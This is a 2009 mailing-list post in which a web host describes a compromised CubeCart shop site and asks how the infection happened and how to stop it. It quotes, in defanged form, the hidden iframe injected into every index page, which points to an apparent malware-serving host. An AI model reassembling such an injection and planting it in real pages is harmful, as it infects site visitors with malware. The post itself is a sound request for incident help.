[thelist] Server hacked?

Sales @ Lycosa sales at lycosa.co.uk
Fri Jul 10 04:42:17 CDT 2009


Hi, I just had a scary moment, and I thought my server had been compromised.
It turns out that just one site had been compromised, with the injection of
the following code into all the index pages within each directory of the
site. (I have added spaces to prevent the link delivering its payload).

 

i_f_r_a_m_e  s_r_c=" http: // a5g. ru :8080/ ts/ in. cgi? pepsi94 "
width=125 height=125 style="visibility: hidden"

 

The site runs cube cart, and I suspect a Trojan was somehow added to the
review pages of the site. No passwords were altered, so I am assuming this
is the work of a script. I take the security of my servers very seriously,
and I take steps to maintain their integrity, but this is a new one for me.
Also, according to my customer, his site has been listed as dangerous with
Google.

 

My question is this: how did a script infect my server without a
username/password, and how do I prevent this happening again?

 

[ I have researched Google, and sent a support ticket to my hosting company,
but nothing yet ]

 

Thanks.

 

Phil Parker

 

 

Kind regards,

Phil Parker


Lycosa Web Services Ltd, 
47 Hilderthorpe Road,
Bridlington,
East Yorkshire.
YO15 3AZ.

Tel: 01262 42 42 99
Email:  <mailto:sales at lycosa.co.uk> sales at lycosa.co.uk
Web:  <http://www.lycosa.co.uk> http://www.lycosa.co.uk

Registered in England and Wales company no. 04614248
------------------------------------------------------------------------
WEB DESIGN - ECOMMERCE SOLUTIONS - WEB PROMOTION
------------------------------------------------------------------------
Disclaimer: The information in this email is confidential and is intended
solely for the use of the addressee. If you are not the intended recipient
of this email you have received it in error and any disclosure, copying or
distribution is strictly prohibited.
Any quotation or estimate is valid for 30 days from the date of this email.

E. & O. E.

 




More information about the thelist mailing list